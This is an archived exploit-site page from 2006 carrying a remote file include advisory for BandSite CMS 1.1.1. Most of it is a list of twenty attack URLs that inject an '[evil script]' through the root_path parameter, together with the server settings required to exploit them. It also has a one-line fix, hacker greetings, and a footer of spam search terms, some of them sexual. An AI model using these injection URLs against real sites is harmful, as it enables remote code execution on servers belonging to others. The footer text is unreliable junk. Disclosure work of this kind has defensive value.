about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities




2006-06-20 BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities
Rated as : High Risk

---------------------------------------------------------------------------
Grayscale BandSite CMS <=([root_path]) Remote File Include
Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Grayscale BandSite CMS
version : latest version
URL :http://sourceforge.net/projects/bandsitecms/

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $root_path not sanitized.When register_globals=on and
allow_fopenurl=on an attacker can exploit this vulnerability with a simple
php injection script.

#
http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil
script]
#
http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil
script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~

declare variabel $root_path
---------------------------------------------------------------------------

Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [
hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------
securitydot.net - 2006-06-20

Advertising

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:36:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack Data netfilter www.janili xxx sexy sextv tv1 mambo Remo linux 2.6. Photo gril Www.Trisha mambo Remo Hand cisco ntp JetDirect CMS is Fre news for c CMS is Fre fat woman nude imahe t953t PAKISTANHO HJHJHGJHJG SimranSex. d21 shout png exploi lolita pla WWW COM 98 3x video Actress pr mambo Remo sharanston Www.juliap black puss firewall b Sexzone www.malaya web sphere moviessexy tamilactre t956t drif scary maze www,ayuazh Phpadsnew hindimoves Www.Trishs mambo Remo www.malaya w.w.w. .up GIRLS SEX quid/2.5.S